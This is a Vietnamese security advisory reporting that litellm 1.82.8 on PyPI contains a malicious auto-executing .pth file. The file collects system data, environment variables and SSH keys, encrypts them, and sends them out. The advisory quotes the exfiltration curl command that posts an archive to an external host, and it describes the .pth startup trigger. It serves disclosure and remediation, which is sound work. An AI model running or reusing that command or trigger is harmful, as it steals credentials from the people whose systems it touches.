Tổng quan
Package litellm==1.82.8 trên PyPI chứa một file .pth độc hại (litellm_init.pth) tự động thực thi script đánh cắp thông tin mỗi khi Python được khởi động, ngay cả khi không sử dụng import litellm.
Cách tái tạo vấn đề
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith('.pth')]
print('PTH files:', pth)
for p in pth:
print(z.read(p)[:300])"Phân tích hành vi độc hại
Script này mã hóa hai lần bằng base64. Khi giải mã, nó thực hiện:
Giai đoạn 1: Thu thập thông tin
- Thông tin hệ thống:
hostname,whoami,uname -a,ip addr,ip route - Biến môi trường
- Khóa SSH và nhiều thông tin bảo mật khác
Giai đoạn 2: Mã hóa và gửi dữ liệu đi
- Ghi dữ liệu vào file tạm
- Mã hóa dữ liệu với
openssl enc -aes-256-cbc - Khóa AES được mã hóa qua RSA công khai
- Đóng thành
tpcp.tar.gzvà gửi đi qua:
curl -s -o /dev/null -X POST \
"https://models.litellm.cloud/" \
-H "Content-Type: application/octet-stream" \
-H "X-Filename: tpcp.tar.gz" \
--data-binary @tpcp.tar.gzChi tiết kỹ thuật
- Cơ chế kích hoạt:
.pthđược thực thi tự động khi Python khởi động - Mục tiêu gửi dữ liệu:
https://models.litellm.cloud/
Tác động
Người dùng cài đặt litellm==1.82.8 đã bị mất thông tin bảo mật.
Phiên bản Ảnh hưởng
- Xác nhận:
litellm==1.82.8 - Phiên bản khác: Chưa kiểm tra
Hành động đề xuất
- PyPI: Xóa bản litellm 1.82.8 ngay lập tức
- Người dùng: Xoá
litellm_init.pthkhỏi thư mụcsite-packages/
Môi trường
- OS: Ubuntu 24.04
- Python: 3.13
Hãy thực hiện thay đổi để bảo vệ hệ thống của bạn.